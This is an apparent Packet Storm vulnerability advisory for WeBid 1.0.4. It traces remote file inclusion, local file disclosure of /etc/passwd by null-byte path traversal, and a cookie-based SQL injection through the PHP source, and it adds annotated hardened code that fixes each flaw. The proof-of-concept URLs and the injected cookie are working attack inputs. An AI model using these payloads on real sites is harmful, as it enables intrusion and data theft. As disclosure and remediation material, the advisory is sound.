WeBid 1.0.4 RFI / File Disclosure / SQL Injection

Posted Aug 17, 2012
Authored by dun

WeBid versions 1.0.4 and below suffer from local file disclosure, remote file inclusion, and remote SQL injection vulnerabilities.

tags | exploit, remote, local, vulnerability, code execution, sql injection, file inclusion
MD5 | ac9c4aac1cb4fe45a1096c644e47b339

:::::::-.   ...    ::::::.    :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM

[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-08-17 ]
################################################
# [ WeBid <= 1.0.4 ] Multiple Vulnerabilities #
################################################
#
# Script: "Open source php/mysql fully featured auction script"
#
# Vendor: http://www.webidsupport.com/
# Download: http://sourceforge.net/projects/simpleauction/files/simpleauction/
#
################################################
# [RFI] ( allow_url_include = On; register_globals = On; )
# PoC: http://localhost/WeBid/loader.php?js=admin/logout.php&include_path=http://localhost/info.txt?
#
# File: ./WeBid/loader.php (lines: 15-60)
# ..cut..
# ob_start('ob_gzhandler');
# header("Content-type: text/javascript");
# include 'includes/checks/files.php'; // 1 ( Definition of $file_hashs array )
# if (isset($_GET['js']))
# {
#     $js = explode(';', $_GET['js']); // 3 js = admin/logout.php (for example)
#     foreach ($js as $val)
#     {
#         $ext = substr($val, strrpos($val, '.') + 1); // 4
#         if ($ext == 'php') // 4
#         {
#             if (check_file($val)) // 5
#             {
#                 include $val; // 10 include admin/logout.php
#             }
#         }
#         ..cut..
#     }
# }
# ob_end_flush();
#
# function check_file($file)
# {
#     global $file_hashs; // 6
#     $tmp = $file_hashs;
#     $folders = explode('/', $file); // 7 $folders = Array([0] => admin, [1] => logout.php)
#     foreach ($folders as $val) // 8 This loop checks if parts of $folders are in $file_hashs
#     {
#         if (isset($tmp[$val]))
#         {
#             $tmp = $tmp[$val];
#         }
#         else
#         {
#             return false;
#         }
#     }
#     return true; // 9 admin/logout.php passed
# }
# ..cut..
#
# File: ./WeBid/includes/checks/files.php (lines: 2-19)
# ..cut..
# $file_hashs = array( // 2 List of files that can be included.
#     ..cut..
#     'admin' => array( // 2
#         'logout.php' => 'a0db39b73dcfd29feb1466002c4f59a4', // 2
#         ..cut..
#     ),
#     ..cut..
# );
#
# File: ./WeBid/admin/logout.php (lines: 16-17)
# ..cut.. // 11 common.inc.php file contains a definition of $include_path
# include '../includes/common.inc.php'; // 11 Failed, because loader.php is in root path
# include $include_path . 'functions_admin.php'; // 12 *[RFI] $include_path is not set by script
# ..cut.. // 12 If register_globals is On, we can set $include_path
#
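# The root cause above is a chain of two weaknesses: loader.php includes an allowlisted file
# relative to the web root, and that file then trusts a global ($include_path) that is only
# defined if its own relative include succeeded. The following is an added example of a
# hardened loader, not WeBid's code; $allowedFiles, resolve_include() and the PHP 7.1+
# assumption are mine. It defines $include_path from the script location, refuses URLs and
# NUL bytes before any filesystem call, and canonicalises the target with realpath() so only
# files physically under the web root can be required.

```php
<?php
// Added example, not WeBid's code. Assumes PHP >= 7.1.
// Define $include_path from the script location rather than from a request
// global; with register_globals this variable could otherwise be attacker-set.
$include_path = __DIR__ . '/includes/';

// Allowlist keyed like WeBid's $file_hashs array (assumed contents).
$allowedFiles = [
    'admin' => ['logout.php' => true],
];

/**
 * Return the canonical path of an allowlisted file, or null if the request
 * must be rejected. Hypothetical helper written for this example.
 */
function resolve_include(string $requested, array $allowed, string $baseDir): ?string
{
    // Reject stream wrappers (http://, php://, data:) and NUL bytes outright.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $requested) || strpos($requested, "\0") !== false) {
        return null;
    }
    // Walk the allowlist the same way check_file() does.
    $node = $allowed;
    foreach (explode('/', $requested) as $part) {
        if (!is_array($node) || !isset($node[$part])) {
            return null;
        }
        $node = $node[$part];
    }
    // realpath() resolves ".." and symlinks and fails for remote URLs; the
    // prefix check then confirms the file lives under $baseDir.
    $real = realpath($baseDir . '/' . $requested);
    $base = realpath($baseDir);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

if (isset($_GET['js'])) {
    header('Content-type: text/javascript');
    foreach (explode(';', (string) $_GET['js']) as $val) {
        if (substr($val, -4) !== '.php') {
            continue;
        }
        $path = resolve_include($val, $allowedFiles, __DIR__);
        if ($path === null) {
            http_response_code(400);
            exit('invalid file');
        }
        // require (not include) at top level: a missing dependency aborts
        // instead of silently leaving $include_path undefined, and WeBid's
        // globals stay in scope for the included file.
        require $path;
    }
}
```

# The included file needs the matching change: admin/logout.php should load its dependencies
# with `require __DIR__ . '/../includes/common.inc.php';` so the include no longer depends on
# the working directory of whichever script pulled it in. With that in place, $include_path
# is always set by the application before it is used, and register_globals has nothing to
# overwrite.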
################################################
# [Local File Disclosure] ( magic_quotes_gpc = Off; php version < 5.3.4 )
# PoC: http://localhost/WeBid/getthumb.php?fromfile=getthumb.php&w=../../../../../etc/passwd%00
#
# File: ./WeBid/getthumb.php (lines: 17-52)
# ..cut..
# $w = (isset($_GET['w'])) ? $_GET['w'] : ''; // 1
# $fromfile = (isset($_GET['fromfile'])) ? $_GET['fromfile'] : ''; // 2
# $nomanage = false;
# ..cut..
# if (!isset($_GET['fromfile'])) // 3
# {
#     ErrorPNG('params empty');
#     exit;
# }
# elseif (!file_exists($_GET['fromfile']) && !fopen($_GET['fromfile'], 'r')) // 4
# {
#     ErrorPNG('img does not exist');
#     exit;
# }
#
# if (file_exists($upload_path . 'cache/' . $_GET['w'] . '-' . md5($fromfile))) // 5
# {
#     $img = getimagesize($fromfile);
#     if ($img[2] == 1)
#     {
#         $img['mime'] = 'image/png';
#     }
#     header('Content-type: ' . $img['mime']);
#     echo file_get_contents($upload_path . 'cache/' . $_GET['w'] . '-' . md5($fromfile)); // 6 *[LFD]
# }
# }
# ..cut..
#
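# The disclosure works because $_GET['w'] is concatenated into a filesystem path unchecked,
# and on PHP < 5.3.4 a %00 terminates the path so the "-<md5>" suffix never reaches the
# filesystem. The following is an added example of a hardened thumbnail handler, not WeBid's
# code; resolve_thumb(), serve_thumb(), the "bare file name under $upload_path" convention
# and PHP 7.1+ are assumptions of this example. $upload_path is WeBid's own variable.

```php
<?php
// Added example, not WeBid's code. Assumes PHP >= 7.1 and that thumbnails
// are keyed by a bare image file name inside $upload_path (assumption).

/**
 * Map the request parameters to a cached thumbnail path, or null on any
 * validation failure. Hypothetical helper written for this example.
 */
function resolve_thumb(string $uploadPath, string $w, string $fromfile): ?string
{
    // The width is a small positive integer and nothing else; this removes
    // "../" sequences and NUL bytes before they can reach a path.
    if (!preg_match('/^[1-9][0-9]{0,3}$/', $w)) {
        return null;
    }
    // The source image is a plain file name with an image extension: no
    // directory separators, no NUL, no stream wrappers.
    if (!preg_match('/^[A-Za-z0-9_.-]+\.(jpe?g|png|gif)$/i', $fromfile)) {
        return null;
    }
    // Canonicalise and confirm the source really sits under the upload dir.
    $uploadReal = realpath($uploadPath);
    $source = realpath($uploadPath . '/' . $fromfile);
    if ($uploadReal === false || $source === false
        || strpos($source, $uploadReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    // The cache key is built only from values that passed validation.
    $cache = $uploadReal . '/cache/' . $w . '-' . md5($fromfile);
    return is_file($cache) ? $cache : null;
}

function serve_thumb(string $uploadPath): void
{
    $w = isset($_GET['w']) ? (string) $_GET['w'] : '';
    $fromfile = isset($_GET['fromfile']) ? (string) $_GET['fromfile'] : '';

    $cache = resolve_thumb($uploadPath, $w, $fromfile);
    if ($cache === null) {
        http_response_code(404);
        exit;
    }
    // Derive the MIME type from the file actually being served and refuse
    // anything getimagesize() does not recognise as an image.
    $info = getimagesize($cache);
    if ($info === false || !isset($info['mime']) || strpos($info['mime'], 'image/') !== 0) {
        http_response_code(404);
        exit;
    }
    header('Content-Type: ' . $info['mime']);
    header('X-Content-Type-Options: nosniff');
    readfile($cache);
}

// Usage, with WeBid's $upload_path already defined by its configuration:
// serve_thumb($upload_path);
```

# Two design points carry most of the weight: every request value is matched against a strict
# pattern before it is used in a path, and the final path is re-derived with realpath() and
# prefix-checked against the upload directory, so the handler does not depend on the PHP
# version's NUL-byte behaviour or on magic_quotes_gpc.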
################################################
# [Blind SQL Injection] ( magic_quotes_gpc = Off; )
# PoC:
# http://localhost/WeBid/contents.php
# GET /WeBid/contents.php HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: pl,en-us;q=0.7,en;q=0.3
# Accept-Encoding: gzip, deflate
# Connection: keep-alive
# Cookie: WEBID_ONLINE=-1' OR 1=1--
#
# File: ./WeBid/contents.php (lines: 15, 38)
# ..cut..
# include 'includes/common.inc.php';
# ..cut..
# include 'header.php'; // 1
# ..cut..
#
# File: ./WeBid/header.php (line: 26)
# ..cut..
# $counters = load_counters(); // 2
# ..cut..
#
# File: ./WeBid/includes/functions_global.php (lines: 287-320)
# ..cut..
# function load_counters() // 3
# {
#     ..cut..
#     if (!$user->logged_in)
#     {
#         if (!isset($_COOKIE['WEBID_ONLINE']))
#         {
#             $s = md5(rand(0, 99) . session_id());
#             setcookie('WEBID_ONLINE', $s, time() + 900);
#         }
#         else
#         {
#             $s = $_COOKIE['WEBID_ONLINE']; // 4
#             setcookie('WEBID_ONLINE', $s, time() + 900);
#         }
#     }
#     ..cut..
#     $query = "SELECT id FROM " . $DBPrefix . "online WHERE SESSION = '$s'"; // 5 *[SQL]
#     $res = mysql_query($query);
#     $system->check_mysql($res, $query, __LINE__, __FILE__);
#     ..cut..
#
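# The cookie value is written by the script itself as an md5() digest, so anything that is not
# 32 hex characters is already invalid input; the bug is that load_counters() neither checks
# the shape nor parameterises the query. The following is an added example of the same logic
# with both fixes, not WeBid's code; $db (a mysqli connection), is_valid_online_token(),
# online_session_token(), count_online_session() and PHP 7.3+ are assumptions of this
# example. $DBPrefix is WeBid's own configuration value.

```php
<?php
// Added example, not WeBid's code. Assumes PHP >= 7.3 and a mysqli
// connection in $db (assumption); $DBPrefix is WeBid's config value.

/** Only a 32-character lowercase hex digest is a legitimate token. */
function is_valid_online_token(string $s): bool
{
    return (bool) preg_match('/^[0-9a-f]{32}$/', $s);
}

/**
 * Return the visitor's online-tracking token, minting a fresh one whenever
 * the cookie is absent or malformed. Hypothetical helper for this example.
 */
function online_session_token(): string
{
    $s = isset($_COOKIE['WEBID_ONLINE']) ? (string) $_COOKIE['WEBID_ONLINE'] : '';
    if (!is_valid_online_token($s)) {
        // Never echo an untrusted value back into the cookie; derive a new
        // token from the CSPRNG instead of rand(0, 99).
        $s = md5(random_bytes(16) . session_id());
    }
    setcookie('WEBID_ONLINE', $s, [
        'expires'  => time() + 900,
        'path'     => '/',
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    return $s;
}

/**
 * Count rows in the online table for a token using a prepared statement.
 * Hypothetical helper for this example.
 */
function count_online_session(mysqli $db, string $DBPrefix, string $s): int
{
    // $DBPrefix comes from configuration, not from the request, so it may be
    // interpolated into the identifier; the token is bound as a parameter
    // and can never change the query structure.
    $stmt = $db->prepare("SELECT id FROM `{$DBPrefix}online` WHERE SESSION = ?");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('s', $s);
    $stmt->execute();
    $stmt->store_result();
    $rows = $stmt->num_rows;
    $stmt->close();
    return $rows;
}

// Usage inside the anonymous-visitor branch of load_counters():
// $s = online_session_token();
// $online = count_online_session($db, $DBPrefix, $s);
```

# Either fix alone closes the injection; keeping both means a malformed cookie is discarded
# before it ever reaches the database layer, which also makes the anomaly easy to log and
# alert on at the application level.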
### [ dun / 2012 ] #############################


© 2019 Packet Storm. All rights reserved.